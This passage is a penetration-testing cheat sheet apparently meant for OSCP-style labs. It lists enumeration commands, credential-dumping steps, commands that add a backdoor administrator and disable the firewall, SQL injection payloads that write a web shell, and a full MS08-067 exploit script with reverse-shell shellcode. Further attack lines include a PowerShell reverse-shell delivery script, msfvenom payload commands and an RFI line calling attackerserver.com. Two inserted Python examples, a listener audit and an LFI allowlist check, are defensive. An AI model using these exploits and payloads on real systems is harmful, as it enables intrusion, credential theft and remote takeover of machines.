- Allows unauthenticated login:


```
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445

enum4linux -a INSERTIPADDRESS

rpcclient -U "" INSERTIPADDRESS
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall

smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
smbclient //INSERTIPADDRESS/admin$ -U john

Log in with shell:
winexe -U username //INSERTIPADDRESS "cmd.exe" --system

```

### Port 161/162 UDP - SNMP


```
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
snmp-check -t INSERTIPADDRESS -c public
```

```
# Common community strings
public
private
community
```



### Port 554 - RTSP


### Port 1030/1032/1033/1038

Used by RPC to connect in domain network. Usually nothing.

### Port 1433 - MSSQL

- Version:

```
use auxiliary/scanner/mssql/mssql_ping

# Last option: brute force.
scanner/mssql/mssql_login

# Log in to mssql
sqsh -S INSERTIPADDRESS -U sa

# Execute commands
xp_cmdshell 'date'
go
```

If you have credentials look in metasploit for other modules.

### Port 1521 - Oracle

- Name:
- Version:
- Password protected:

```
tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS
```


### Port 2100 - Oracle XML DB

Can be accessed through ftp.
Some default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm

- Name:
- Version:

Default logins:

```
sys:sys
scott:tiger
```

### Port 2049 - NFS

```
showmount -e INSERTIPADDRESS

If you find anything you can mount it like this:

mount INSERTIPADDRESS:/ /tmp/NFS
mount -t nfs INSERTIPADDRESS:/ /tmp/NFS
```

### Port 3306 - MySQL

- Name:
- Version:

```
mysql --host=INSERTIPADDRESS -u root -p

nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306
```

### Port 3339 - Oracle web interface

- Basic info about web service (apache, nginx, IIS)
- Server:
- Scripting language:
- Apache Modules:
- IP-address:
- Domain-name address:

### Port 3389 - Remote desktop

Test logging in to see what OS is running

```
rdesktop -u guest -p guest INSERTIPADDRESS -g 94%

# Brute force
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
```


### Port 80

- Server:
- Scripting language:
- Apache Modules:
- Domain-name address:

INSERTCURLHEADER


- Web application
- Name:
- Version:

```
# Nikto
nikto -h http://INSERTIPADDRESS

# Nikto with squid proxy
nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444

# Get header
curl -i INSERTIPADDRESS

# Get everything
curl -i -L INSERTIPADDRESS

# Check if it is possible to upload using put
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php

# Directory traversal fuzzing
dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
```


#### Nikto scan


INSERTNIKTOSCAN



#### Url brute force



```
# Dirb
dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt

# Gobuster - remove relevant response codes (403 for example)
gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```

INSERTDIRBSCAN


#### Default/Weak login

Google documentation for default passwords and test them:

```
site:webapplication.com password
```

```
admin admin
admin password
admin
admin nameofservice
root root
root admin
root password
root nameofservice
password
admin
username
nameofservice
```

#### LFI/RFI

```
# Kadimus
/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=


# Bypass execution
http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index
base64 -d savefile.php

# Bypass extension
http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00
http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt? 343 | ``` 344 | 345 | 346 | #### SQL-Injection 347 | 348 | ``` 349 | # Post 350 | ./sqlmap.py -r search-test.txt -p tfUPass 351 | 352 | # Get 353 | sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql 354 | 355 | # Crawl 356 | sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3 357 | ``` 358 | 359 | #### Sql-login-bypass 360 | 361 | 362 | - Open Burp-suite 363 | - Make and intercept request 364 | - Send to intruder 365 | - Cluster attack 366 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html) 367 | - Attack 368 | - Check for response length variation 369 | 370 | ### Password brute force - last resort 371 | 372 | ``` 373 | cewl 374 | ``` 375 | 376 | ### Port 443 - HTTPS 377 | 378 | Heartbleed: 379 | 380 | ``` 381 | sslscan INSERTIPADDRESS:443 382 | ``` 383 | 384 | ## Vulnerability analysis 385 | 386 | Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilities and features. 387 | 388 | ### To try - List of possibilities 389 | Add possible exploits here: 390 | 391 | 392 | ### Find sploits - Searchsploit and google 393 | 394 | Where there are many exploits for a software, use google. It will automatically sort it by popularity. 
```
site:exploit-db.com apache 2.4.7

# Remove dos-exploits
searchsploit Apache 2.4.7 | grep -v '/dos/'
searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"

# Only search the title (exclude the path): add -t
searchsploit -t Apache | grep -v '/dos/'
```

----------------------------------------------------------------------------

'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''

-----------------------------------------------------------------------------

## Privilege escalation

Now we start the whole enumeration process over again. This is a checklist. You need to check off every single item, in this order.

- Kernel exploits
- Cleartext password
- Reconfigure service parameters
- Inside service
- Program running as root
- Installed software
- Scheduled tasks
- Weak passwords

### To-try list
Here you will add all possible leads. What to try.
### Basic info

- OS:
- Version:
- Architecture:
- Current user:
- Hotfixes:
- Antivirus:

**Users:**

**Localgroups:**

```
systeminfo
set
hostname
net users
net user user1
net localgroup
accesschk.exe -uwcqv "Authenticated Users" *

netsh firewall show state
netsh firewall show config

# Set path
set PATH=%PATH%;C:\xampp\php
```

### Kernel exploits

```
# Look for hotfixes
systeminfo

wmic qfe get Caption,Description,HotFixID,InstalledOn

# Search for exploits
site:exploit-db.com windows XX XX
```

### Cleartext passwords

```
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### Reconfigure service parameters

- Unquoted service paths

Check book for instructions

- Weak service permissions

Check book for instructions

### Inside service

Check netstat to see what ports are open from the outside and from the inside. Look for ports only available on the inside.
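The "inside vs outside" comparison above is easy to do by hand for a few ports, but it is also a useful standing audit for a host you administer: anything bound only to loopback is invisible to a network scan yet reachable by every process on the box, and anything bound to all interfaces that an external scan did not see is being filtered by a host firewall. The following Python script is an added example, not part of the OSCP-Treasure-Cave notes; the `netstat -ano` text and the set of ports "seen from outside" are constructed for the example.

```python
# Constructed sample of `netstat -ano` output from a Windows host (not a real capture).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1204
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       2516
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       3040
  TCP    10.11.1.5:445          10.11.0.157:51234      ESTABLISHED     4
  TCP    [::]:135               [::]:0                 LISTENING       812
  UDP    0.0.0.0:161            *:*                                    1440
  UDP    127.0.0.1:1900         *:*                                    2100
"""

# Constructed result of an nmap scan run from another host: (proto, port) pairs reported open.
EXTERNAL_SCAN_OPEN = {("TCP", 135), ("TCP", 445), ("UDP", 161)}

LOOPBACK = {"127.0.0.1", "::1"}


def parse_netstat(text):
    """Parse `netstat -ano` lines into dicts. UDP rows have no state column, so
    they are marked BOUND; a bound UDP socket is reachable like a TCP listener."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue  # banner and header lines
        proto, local = parts[0], parts[1]
        state = parts[3] if proto == "TCP" and len(parts) >= 5 else "BOUND"
        addr, port = local.rsplit(":", 1)
        rows.append({"proto": proto, "addr": addr.strip("[]"), "port": int(port),
                     "state": state, "pid": int(parts[-1])})
    return rows


def classify_listeners(rows):
    """Return (exposed, loopback_only) as sorted lists of (proto, port).
    A listener on 127.0.0.1/::1 cannot be reached from the network, but any
    process already running on the host can talk to it."""
    exposed, loopback_only = set(), set()
    for r in rows:
        if r["state"] not in ("LISTENING", "BOUND"):
            continue  # established / time-wait connections are not listeners
        bucket = loopback_only if r["addr"] in LOOPBACK else exposed
        bucket.add((r["proto"], r["port"]))
    return sorted(exposed), sorted(loopback_only)


def compare_with_external_scan(rows, seen_externally):
    """Listeners bound to a non-loopback address that an outside scan did not
    report are most likely filtered by the host firewall; the loopback-only
    set is the list of services that need their own authentication because a
    foothold on the host reaches them directly."""
    exposed, loopback_only = classify_listeners(rows)
    return {
        "reachable": [lp for lp in exposed if lp in seen_externally],
        "firewalled": [lp for lp in exposed if lp not in seen_externally],
        "loopback_only": loopback_only,
    }


if __name__ == "__main__":
    report = compare_with_external_scan(parse_netstat(SAMPLE_NETSTAT), EXTERNAL_SCAN_OPEN)
    for label, ports in report.items():
        print("%-14s %s" % (label + ":", ", ".join("%s/%d" % (p, n) for p, n in ports)))
```

Feed it real output by piping `netstat -ano` into a file and replacing `SAMPLE_NETSTAT`; the external set comes from whatever scanner you ran from the other side of the firewall.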
```
# Meterpreter
run get_local_subnets

netstat /a
netstat -ano
```

### Programs running as root/system

### Installed software

```
# Metasploit
ps

tasklist /SVC
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY

# Look in:
# C:\Program files
# C:\Program files (x86)
# Home directory of the user
```

### Scheduled tasks

```
schtasks /query /fo LIST /v

# Check this file:
# c:\WINDOWS\SchedLgU.Txt
```

### Weak passwords

Remote desktop

```
ncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
```

### Useful commands

**Add user and enable RDP**

```
net user haxxor Haxxor123 /add
net localgroup Administrators haxxor /add
net localgroup "Remote Desktop Users" haxxor /ADD

# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Turn firewall off
netsh firewall set opmode disable
```

If you get this error:

```
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
Failed to connect, CredSSP required by server.
```

Add this reg key:

```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
```

------------------------------------------------------------------------

----------------------------- LOOT LOOT LOOT LOOT -------------------

------------------------------------------------------------------------

## Loot

- Proof:
- Network secret:
- Password and hashes:
- Dualhomed:
- Tcpdump:
- Interesting files:
- Databases:
- SSH-keys:
- Browser:

### Proof

### Network secret

### Passwords and hashes

```
wce32.exe -w
wce64.exe -w
fgdump.exe

reg.exe save hklm\sam c:\sam_backup
reg.exe save hklm\security c:\security_backup
reg.exe save hklm\system c:\system

# Meterpreter
hashdump
load mimikatz
msv
```

### Dualhomed

```
ipconfig /all
route print

# What other machines have been connected
arp -a
```

### Tcpdump

```
# Meterpreter
run packetrecorder -li
run packetrecorder -i 1
```

### Interesting files

```
# Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql

# How to cat files in meterpreter
cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt

# Recursive search
dir /s
```

### Mail

### Browser

- Browser start-page:
- Browser-history:
- Saved passwords:

### Databases

### SSH-keys

## How to replicate:

--------------------------------------------------------------------------------
/SQL:
--------------------------------------------------------------------------------

SQSH

# Login
sqsh -S : -U sa -P password

# commands
exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user kalisa pass /add'
go
exec xp_cmdshell 'net localgroup Administrators kalisa /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add'
go

------------------------------

SQLMAP
# Crawl the links
sqlmap -u http:// --crawl=1
sqlmap -u http:// --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3

# Search for databases
sqlmap -u http:///index.php?par= --dbs

# dump tables from database
sqlmap -u http:///index.php?par= --dbs -D dbname --tables --dump
sqlmap -u http:///index.php?par= --dbs -D dbname -T tablename --dump

# OS Shell
sqlmap -u http:///comment.php?id=738 --dbms=mysql --os-shell

--------------------------------

Manual sql injection commands

# check for sqli vulnerability
?id=1'

# find the number of columns
?id=1 order by 9 -- -

# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

# Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

# Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

# Get content from the users-table, from the columns name and password.
# (The 0x3a only serves to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users

# read file
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -

# create a file and call it to check if it was really created
?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -

# create a file to get a shell
?id=1 union select null,null,null,null,'' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -

# then go to browser and see if you can execute commands
http:///shell.php?cmd=id

# Then use Pentest Monkey Reverse Shells to call your shell

--------------------------------------------------------------------------------
/Scripts - MS08-067:
--------------------------------------------------------------------------------
#!/usr/bin/env python
import struct
import time
import sys
from threading import Thread  # Thread is imported in case you would like to modify

try:
    from impacket import smb
    from impacket import uuid
    #from impacket.dcerpc import dcerpc
    from impacket.dcerpc.v5 import transport

except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : https://github.com/CoreSecurity/impacket.git'
    print 'PyCrypto : https://pypi.python.org/pypi/pycrypto'
    sys.exit(1)

print '#######################################################################'
print '# MS08-067 Exploit'
print '# This is a modified version of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).'
22 | print '# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi' 23 | print '#' 24 | print '# Mod in 2018 by Andy Acer:' 25 | print '# - Added support for selecting a target port at the command line.' 26 | print '# It seemed that only 445 was previously supported.' 27 | print '# - Changed library calls to correctly establish a NetBIOS session for SMB transport' 28 | print '# - Changed shellcode handling to allow for variable length shellcode. Just cut and paste' 29 | print '# into this source file.' 30 | print '#######################################################################\n' 31 | 32 | 33 | # ------------------------------------------------------------------------ 34 | # REPLACE THIS SHELLCODE with shellcode generated for your use 35 | # Note that length checking logic follows this section, so there's no need to count bytes or bother with NOPS. 36 | # 37 | # Example msfvenom commands to generate shellcode: 38 | # msfvenom -p windows/shell_bind_tcp RHOST=10.11.1.229 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows 39 | # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.157 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows 40 | # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.157 LPORT=62000 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows 41 | 42 | # Reverse TCP to 10.11.0.36 port 4444: 43 | shellcode=( 44 | "\x29\xc9\x83\xe9\xa5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" 45 | "\xfd\x91\x94\x90\x83\xee\xfc\xe2\xf4\x01\x79\x16\x90\xfd\x91" 46 | "\xf4\x19\x18\xa0\x54\xf4\x76\xc1\xa4\x1b\xaf\x9d\x1f\xc2\xe9" 47 | "\x1a\xe6\xb8\xf2\x26\xde\xb6\xcc\x6e\x38\xac\x9c\xed\x96\xbc" 48 | "\xdd\x50\x5b\x9d\xfc\x56\x76\x62\xaf\xc6\x1f\xc2\xed\x1a\xde" 49 | "\xac\x76\xdd\x85\xe8\x1e\xd9\x95\x41\xac\x1a\xcd\xb0\xfc\x42" 50 | 
"\x1f\xd9\xe5\x72\xae\xd9\x76\xa5\x1f\x91\x2b\xa0\x6b\x3c\x3c" 51 | "\x5e\x99\x91\x3a\xa9\x74\xe5\x0b\x92\xe9\x68\xc6\xec\xb0\xe5" 52 | "\x19\xc9\x1f\xc8\xd9\x90\x47\xf6\x76\x9d\xdf\x1b\xa5\x8d\x95" 53 | "\x43\x76\x95\x1f\x91\x2d\x18\xd0\xb4\xd9\xca\xcf\xf1\xa4\xcb" 54 | "\xc5\x6f\x1d\xce\xcb\xca\x76\x83\x7f\x1d\xa0\xf9\xa7\xa2\xfd" 55 | "\x91\xfc\xe7\x8e\xa3\xcb\xc4\x95\xdd\xe3\xb6\xfa\x18\x7c\x6f" 56 | "\x2d\x29\x04\x91\xfd\x91\xbd\x54\xa9\xc1\xfc\xb9\x7d\xfa\x94" 57 | "\x6f\x28\xfb\x9e\xf8\xf7\x9a\x94\xb4\x95\x93\x94\xb2\x45\x18" 58 | "\x72\xc0\xad\xc1\xc4\xd0\xad\xd1\xc4\xf8\x17\x9e\x4b\x70\x02" 59 | "\x44\x03\xfa\xed\xc7\xc3\xf8\x64\x34\xe0\xf1\x02\x44\x11\x50" 60 | "\x89\x9b\x6b\xde\xf5\xe4\x78\x78\x9a\x91\x94\x90\x97\x91\xfe" 61 | "\x94\xab\xc6\xfc\x92\x24\x59\xcb\x6f\x28\x12\x6c\x90\x83\xa7" 62 | "\x1f\xa6\x97\xd1\xfc\x90\xed\x91\x94\xc6\x97\x91\xfc\xc8\x59" 63 | "\xc2\x71\x6f\x28\x02\xc7\xfa\xfd\xc7\xc7\xc7\x95\x93\x4d\x58" 64 | "\xa2\x6e\x41\x13\x05\x91\xe9\xb8\xa5\xf9\x94\xd0\xfd\x91\xfe" 65 | "\x90\xad\xf9\x9f\xbf\xf2\xa1\x6b\x45\xaa\xf9\xe1\xfe\xb0\xf0" 66 | "\x6b\x45\xa3\xcf\x6b\x9c\xd9\x9e\x11\xe0\x02\x6e\x6b\x79\x66" 67 | "\x6e\x6b\x6f\xfc\x52\xbd\x56\x88\x50\x57\x2b\x1d\x8c\xbe\x9a" 68 | "\x95\x37\x01\x2d\x60\x6e\x41\xac\xfb\xed\x9e\x10\x06\x71\xe1" 69 | "\x95\x46\xd6\x87\xe2\x92\xfb\x94\xc3\x02\x44\x94\x90" 70 | ) 71 | # ------------------------------------------------------------------------ 72 | 73 | # Gotta make No-Ops (NOPS) + shellcode = 410 bytes 74 | num_nops = 410 - len(shellcode) 75 | newshellcode = "\x90" * num_nops 76 | newshellcode += shellcode # Add NOPS to the front 77 | shellcode = newshellcode # Switcheroo with the newshellcode temp variable 78 | 79 | #print "Shellcode length: %s\n\n" % len(shellcode) 80 | 81 | nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \ 82 | "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10 83 | disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \ 84 | 28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62" 85 | 
ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01"; 86 | module_base = 0x6f880000 87 | 88 | 89 | def generate_rop(rvas): 90 | gadget1 = "\x90\x5a\x59\xc3" 91 | gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"] 92 | gadget3 = "\xcc\x90\xeb\x5a" 93 | ret = struct.pack(' 00 00 01 36 => 310. No idea why it's "doubled" 197 | # from 310 to 620. 620 = 410 shellcode + extra stuff in the path. 198 | MaxCount = "\x36\x01\x00\x00" # Decimal 310. => Path length of 620. 199 | Offset = "\x00\x00\x00\x00" 200 | ActualCount = "\x36\x01\x00\x00" # Decimal 310. => Path length of 620 201 | 202 | self.__stub = server + MaxCount + Offset + ActualCount + \ 203 | path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00" 204 | 205 | return 206 | 207 | def run(self): 208 | self.__DCEPacket() 209 | self.__dce.call(0x1f, self.__stub) 210 | time.sleep(3) 211 | print 'Exploit finish\n' 212 | 213 | if __name__ == '__main__': 214 | try: 215 | target = sys.argv[1] 216 | os = sys.argv[2] 217 | port = sys.argv[3] 218 | except IndexError: 219 | print '\nUsage: %s \n' % sys.argv[0] 220 | print 'Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445' 221 | print 'Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)' 222 | print 'Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal' 223 | print 'Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English' 224 | print 'Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)' 225 | print 'Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)' 226 | print 'Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)' 227 | print '' 228 | print 'Also: nmap has a good OS discovery script that pairs well with this exploit:' 229 | print 'nmap -p 139,445 --script-args=unsafe=1 --script 
/usr/share/nmap/scripts/smb-os-discovery 192.168.1.1'
        print ''
        sys.exit(-1)

    current = SRVSVC_Exploit(target, os, port)
    current.start()

--------------------------------------------------------------------------------
/Scripts - SMB:
--------------------------------------------------------------------------------
# SMB version check

#!/bin/sh
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z "$1" ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost="$1"; fi
if [ ! -z "$2" ]; then rport="$2"; else rport=139; fi
tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L "$rhost" 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""

# SMB nmap Scripting Engine Vulnerability scan
nmap -p 139,445 10.11.1.115 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse

--------------------------------------------------------------------------------
/Scripts - Windows File Upload Using PS (without nc.exe):
--------------------------------------------------------------------------------
#!/usr/bin/env python2
# Thanks to Alamot!
import sys
import urllib, urllib2
from base64 import b64encode

if (len(sys.argv) < 5):
    print("usage: ")
    exit()

RHOST = sys.argv[1]
RPORT = sys.argv[2]
LHOST = sys.argv[3]
LPORT = sys.argv[4]

print("RHOST="+RHOST+" RPORT="+RPORT+" LHOST="+LHOST+" LPORT="+LPORT+'\n')

payload = "$client = New-Object System.Net.Sockets.TCPClient('"+LHOST+"',"+LPORT+"); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();"

print(payload+'\n')

b64enc_command = b64encode(payload.encode('UTF-16LE')).replace('+','%2b')

url = "http://"+RHOST+":"+RPORT+"/?search=%00{.exec%7CC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe%20-EncodedCommand%20"+b64enc_command+".}"

print(url)
response = urllib2.urlopen(url)
print("\nSTATUS: "+str(response.getcode()))

--------------------------------------------------------------------------------
/Shells:
--------------------------------------------------------------------------------

-----------------------------------------------------

PHP

-----------------------------------------------------
Reverse Shell

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

-----------------------------------------------------

Msfvenom
# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf > shell.elf
# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=443 -f raw > shell.php
# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f asp > shell.asp
# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war > shell.war
# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f raw > shell.jsp
# Exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=445 -f exe -o shell_reverse.exe

-----------------------------------------------------

Interactive TTY Shell
# python
python -c 'import pty; pty.spawn("/bin/sh")'
# Echo (from inside a python prompt)
echo os.system('/bin/bash')
# sh
/bin/sh -i
# bash
/bin/bash -i

-----------------------------------------------------

Shell From SQL Injection
# windows
?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
# linux
?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'

--------------------------------------------------------------------------------
/Web:
--------------------------------------------------------------------------------
HTTP Enumeration
----------------------------------------------
# Gobuster
gobuster -u -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
----------------------------------------------
# nikto
nikto -h
----------------------------------------------
# curl
curl -v -X OPTIONS http:///test/
curl --upload-file -v --url -0 --http1.0
----------------------------------------------
# LFI
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
# Null Byte
?page=../../../../../../etc/passwd%00
----------------------------------------------

# RFI
?page=http://attackerserver.com/evil.txt

----------------------------------------------
# Command Execution

&1|nc 1234 >/tmp/f');?>

---------------------------------------------
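The LFI/RFI entries above (the `php://filter` wrapper, the `%00` null-byte truncation, the trailing `?`, and a remote `http://` URL in the `page` parameter) all rely on the application passing the raw parameter to an include. The usual fix is not a blocklist but an allowlist on the decoded value, so that none of those characters can reach the filesystem layer. The following is an added example in Python, not code from the OSCP-Treasure-Cave notes; the template directory and the set of allowed page names are hypothetical, and the test cases reuse the payloads listed in the notes.

```python
import re
from urllib.parse import unquote

# Hypothetical application: the include parameter may only name one of these templates.
TEMPLATE_ROOT = "/var/www/app/pages"
ALLOWED_PAGES = {"index", "about", "contact"}

# Letters, digits, '_' and '-' only. No '/', '\', ':', '.' or NUL, so traversal,
# stream wrappers, remote URLs and null bytes are rejected by shape alone.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def is_safe_page(param):
    """Allowlist check on the *decoded* parameter, i.e. on the bytes the
    server would actually use after URL decoding (%00 becomes NUL, %2e a dot)."""
    decoded = unquote(param)
    return bool(SAFE_NAME.fullmatch(decoded)) and decoded in ALLOWED_PAGES


def resolve_include(param):
    """Map a validated page name to an absolute template path, else None.
    The extension is appended server-side, so the client never controls it."""
    if not is_safe_page(param):
        return None
    return "%s/%s.php" % (TEMPLATE_ROOT, unquote(param))


# Payloads taken from the notes' LFI/RFI sections, plus legitimate and near-miss values.
CASES = [
    ("index", True),
    ("about", True),
    ("php://filter/convert.base64-encode/resource=index", False),
    ("../../../../../../etc/passwd%00", False),
    ("http://192.168.1.101/maliciousfile.txt%00", False),
    ("http://192.168.1.101/maliciousfile.txt?", False),
    ("http://attackerserver.com/evil.txt", False),
    ("admin", False),  # well-formed name, but not an allowlisted template
]


def run_cases():
    """Return [(payload, accepted)] for every case, for a quick self-check."""
    return [(p, is_safe_page(p)) for p, _ in CASES]


if __name__ == "__main__":
    for payload, accepted in run_cases():
        print("%-52s -> %s" % (payload, "include" if accepted else "reject"))
```

The shape check runs before the allowlist lookup so that a failure is decided on the decoded string, and `resolve_include` builds the path itself rather than trusting anything the client sent.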
